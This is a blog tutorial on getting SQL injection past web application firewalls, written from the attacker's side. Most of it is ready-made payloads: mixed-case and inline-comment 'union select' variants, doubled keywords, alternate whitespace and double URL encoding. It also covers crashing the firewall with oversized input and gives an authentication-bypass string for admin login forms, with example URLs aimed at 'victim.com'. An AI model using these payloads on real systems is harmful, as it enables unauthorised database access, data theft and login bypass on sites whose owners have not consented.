Skip to content

SQL Injection Waff Bypass Tutorial – DXTBLOG

waff bypass sql injection

# Waff Bypass

Note: Before starting this topic, I want to clarify that I won’t be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF ?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.

How does it Work?

When WAF detects any malicious input from end user, It gives 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors

waff bypass sql injection

How to bypass this thing?

So, what to do next? we cant do our further injection right?
Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:

# Case Changing:

Most of the Waf’s only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case.
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments

SQL comments really help us in many cases. They play their important role in killing some Waf’s Restrictions. e.g
// , — , –+ , #, — –

# Inline Comments

Some WAF’s filter keywords like /unionsselect/ig We can bypass these filters by using inline comments most of the time
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3–

waff bypass sql injection

Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.
Anyways, We were talking about Filtered Keywords. So it does not mean that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc
So might need to apply these inline comments on those keywords as well. Example
http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()–

# Double use of Keywords

Sometimes WAF removes whole keyword from the query and execute it and throw errors
In such cases, we can use keywords in this way
http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6–
Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces

Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well
for example + .
%20 is use for space, but we can try using one of these whitespaces . some examples are %09 %0A %0B %0C %0D %A0
inurl:
union%0Bselect%0B1,2,3–

# Encoding

We can always try our luck with URL encode thing to bypass WAF. For example we can use
union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()
as
union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29
but sometime waf filter also filter % itself. So we have to use double URL encoding in that case
union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use buffer overflow or give unexpected query /request to trick WAF filters.
for example:
http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5–
This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow

# use all above mentioned techniques together

ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.
For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)– –
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*–*/union/*–*/select/*–*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

#Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

 Code :
 http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

#Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter: /union\sselect/g

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

#Replaced Keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

Some case SQL keyword was filtered out and replaced with whitespace. So we can use “%0b” to bypass.

http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

For Mod_rewrite, Comments “/**/” cannot bypassed. So we use “%0b” replace “/**/”.

Forbidden: http://victim.com/main/news/id/1/**/
|
|/**/lpad(first_name,7,1).html
Bypassed : http://victim.com/main/news/id/1%0b
|
|%0blpad(first_name,7,1).html

#Advanced Methods

Crash Firewall via doing Buffer Over Flow.

1) Buffer Overflow / Firewall Crash: Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow.

    http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

    You can test if the WAF can be crashed by typing:
    ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

    If you get a 500, you can exploit it using the Buffer Overflow Method.

2) Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values.

Example:
    http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
    (which means “union select”)

4) Misc Exploitable Functions: Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:
    This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
    http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
    (If the Firewall removes the “*”, the result will be: 15+union+select….)
    So, if you find such a silly function, you can exploit it, in this way.

#Auth Bypass

If we need to bypass some admin panels, and we do that using or 1=1.

Code:
or 1-- -' or 1 or '1"or 1 or"

SELECT * FROM login WHERE id=1 or 1– -‘ or 1 or ‘1”or 1 or” AND username=’’ AND password=’’ the “or 1– -“ gets active, make the condition true and ignores the rest of the query. now lets check regular string-

SELECT * FROM login WHERE username=’ or 1– -‘ or 1 or ‘1”or 1 or” ‘ ….. the “or 1” part make the query true, and the other parts are considered as the comparison strings. same with the double quotes. SELECT * FROM login WHERE username=” or 1– -‘ or 1 or ‘1”or 1 or” “




I hope you have enjoyed this article. Please give us your feedback. 
DXTBLOG
waff-bypass-ebookDownload
Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *